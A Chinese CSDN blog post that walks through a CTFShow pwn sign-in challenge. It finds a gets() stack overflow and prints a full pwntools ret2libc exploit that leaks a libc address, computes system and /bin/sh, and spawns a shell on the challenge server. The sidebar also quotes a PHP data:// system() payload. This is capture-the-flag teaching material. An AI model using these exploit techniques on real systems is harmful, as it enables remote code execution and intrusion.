CTFSHOW 签到题

最新推荐文章于 2024-04-28 05:44:05 发布
最新推荐文章于 2024-04-28 05:44:05 发布
阅读量1k 收藏
点赞数
分类专栏: Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121731703
版权

CTFSHOW 萌新赛 签到题

1.题目下载地址

点击下载题目

2. checksec检查保护

在这里插入图片描述
堆不可执行

3.IDA分析

在这里插入图片描述
看到了gets()函数,很明显存在溢出
需要知道64位系统和32位系统的区别
64 位系统传参从第一个到第六个依次保存在rdi,rsi,rdx,rcx,r8,r9
从第7个参数开始,接下来的所有参数都才通过栈传递

4.构造ROP链

我们需要找到合适的 gadgets,利用 ROPgadget
在这里插入图片描述
addr_rdi=0x400793
addr_ret=0x40053e

  • 构造 payload 利用 puts 函数泄漏真实地址(plt 表和 got 表的延迟绑定机制)
  • 然后算出基址 libcbase,并劫持程序回到主函数以便再次利用
  • 用泄露的地址查出 libc 版本,利用 libc 和 libcbase 算出 system() 和 /bin/sh 真实地址
  • 构造 payload getshell

在这里插入图片描述
看一下src的大小是0x70

栈的字节对齐(32 位 8 字节对齐,64 位 16 字节对齐,这样对齐的目的是提高效率)
参见x86_64 Linux 运行时栈的字节对齐
对齐只需要在跳转前面来一次空的 ret

4.exp

#-*- coding: utf-8 -*-
from pwn import * #pwntools
from LibcSearcher import * #用来寻找 libc 
#context.log_level = "debug" #便于调试
p=remote('124.156.121.112',28094)
elf=ELF('pwn1') #名字和导入的 pwn 模块冲突,改成了 pwn1

main_addr=0x400687
rdi_addr=0x400793
ret_addr=0x40053e
put_plt=elf.plt['puts']
put_got=elf.got['printf']

pay='a'*(0x70+8)+p64(rdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)
p.recvuntil('successful!')
p.sendline(pay)
p.recvuntil('joke')
put_addr=u64(p.recv(6)+'\x00\x00')
print hex(put_addr)

libc=LibcSearcher('printf',put_addr)
libcbase=put_addr-libc.dump('printf')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay='a'*(0x70+8)+p64(ret_addr)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)
p.recvuntil('successful!')
p.sendline(pay)
p.interactive()
==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf.show 签到
liekailfan的博客
04-25 3591
一、密码学签到 目:}wohs.ftc{galf 1、提示得倒序 2、解得:flag{ctf.show} 二、crypto2 目: [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]
签到解.md
11-16
签到解.md
【CTFshow 电子取证】套的签到
人若无名,便可专心练剑
03-28 817
!
ctfshow-内部-签到_ctfshow内部签到
最新发布
2401_84298087的博客
04-28 145
我们需要用到两处地方,即两次对数据库操作的地方,一处用于插入payload,在。代码审懂了,但是脚本编写能力确实还欠佳,参考了一下别的师傅的代码,做了一点修改,直接可以跑出答案。构造出来的SQL:在username处找flag,至于爆表爆字段改一改就行了,进行了过滤,只能显示数字,但是没关系,这里通过hex编码绕过,,一处用于执行payload,在。,还需要注意一点,在。
ctfshow-内部-签到
XYH_233的博客
03-30 1258
ctfshow-内部-签到
ctfshow 内部 pwn 签到
SCP000111的博客
11-16 1619
ctfshow 内部 pwn 签到 找了在刷的中,不会做这道,找了好久没找到wp,搞了几天,还怀疑目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的目似乎与这道一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
【CTFshow】——PWN签到
IronmanJay的博客
08-15 901
PWN签到-nc pwn.challenge.ctf.show 28171
ctfshow-CRYPTO-内部-签到
HAI_WD的博客
07-04 468
在线转换一下16进制得到3636364336313637374234393546344334463536343535463333333634343744。说实话这道,正常人很少能绕这么多下绕过来,可能到星座那就无了,只能说脑洞大于思路大于技术。按照对应的顺序排一个序,这里看到2648是白羊,也就是第一个,那么做一下简单的转换。首先看到字符串是一个base64,转换一下。通过base家族爆破一下,最终拿到flag。然后判断一下,使用escape进行解码。看一下base92,得到一个字符串。
CSDN自动签到程序
12-21
【CSDN自动签到程序】是一个利用编程技术实现的自动化工具,主要用于个人在CSDN网站上的每日签到,以避免手动操作的繁琐。该程序由Python编写,结合了Selenium库和Chrome浏览器的ChromeDriver组件,适用于具有图形化...
签到.zip
11-01
签到系统在日常生活中广泛应用,尤其在企业、学校和各种线上活动中,用于追踪参与者的出席情况。"签到.zip" 文件可能包含一个自动签到机器人的相关资源,这通常是为了解决手动签到效率低下或者避免人为错误的问。...
京东签到.zip
11-01
“京东签到.zip”和描述“京东签到.zip”暗示了这个压缩包可能包含与京东平台自动签到相关的程序或脚本。标签“签到”和“机器人”进一步确认了这一点,意味着内部文件可能是用来自动化京东账户的每日签到过程。...
Python人脸识别签到
06-30
Python人脸识别签到是一种基于计算机视觉技术的智能应用,它利用深度学习和图像处理技术来识别个体的身份,并在特定场合如会议、活动或学校等进行自动签到。这种系统通常包括以下几个核心部分: 1. 图像采集:系统...
ctfshow刷-web签到,web2
m0_52011198的博客
02-21 569
ctfshow刷
18(4),腾讯网络安全面试社招
QAZZHONGYI的博客
04-07 235
网站协议抓包Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。BurpSuite安装:下载抓包工具链接:提取码:r83f --来自百度网盘超级会员V5的分享解压缩后打开文件夹,点击点击激活,bat会跳转到该页面然后点击右上角的Run,点击同意协议把license里面的内容复制进当前界面里面。
ctfshow pwn——PWN签到、pwn02
qq_55233040的博客
01-24 5019
PWNPWN签到pwn02 PWN签到 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
[网鼎杯2018]Unfinish&&CTFSHOW内部签到
Je3Z的博客
07-15 1592
CTFSHOW那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下 然后扫目录的时候有源码泄露www.zip,下载后读下代码 user.php <?php include('db.php'); session_start(); error_reporting(0); if($_SESSION['u']){ $username=$_SESSION['u']; if (is_numeric($username)) { if(strl
内部 签到-ctf.show
yuqie的博客
06-14 374
这结果可是跑了好几个网站才出来,观察一下上面的图案,是十二星座,网上科普一下。的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。天秤座 ♎ U+264E(9月23日 - 10月23日)金牛座 ♉ U+2649(4月21日 - 5月21日)双子座 ♊ U+264A(5月22日 - 6月21日)巨蟹座 ♋ U+264B(6月22日 - 7月22日)狮子座 ♌ U+264C(7月23日 - 8月22日)处女座 ♍ U+264D(8月23日 - 9月22日)
CTF SHOW web 签到1
CTF
02-03 442
ctfshow{42b99472-9dab-440b-a50a-9e4d87d01388}打开容器发现,就一句话,直接查看源代码。发现有一段字符串,直接base64解码,发现flag。
CTFSHOW web1-10
m0_57131590的博客
09-23 244
web1/web签到: 没啥好说的,右键源代码出flag web2 猜闭合方式,加上万能密码得到回显: 接下来就是普通的union注入了。 web3 进入目之后让我们以GET方式传参,但是传入url=flag.php发现并没有变化,此时考虑用伪协议。 抓包然后发送至repeater修改: 访问xxx/?url=ctf_go_go_go得到flag web4 乍一看和上一一样,但是如果传入参数带有php的话会报错,这时我们可以进行日志注入(我也不知道怎么得到...
ctfshow web签到
09-12
ctfshow-web中的"web签到"是其中的一道目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到有关。 此外,网站中还包含了一个meta标签:<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 。这个标签指定了网页的字符编码格式。 综上所述,您可以尝试访问ctfshow-web,并查找与web签到相关的内容。您可以注意URL和meta标签中的信息,这可能有助于解决这道目。祝您好运!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值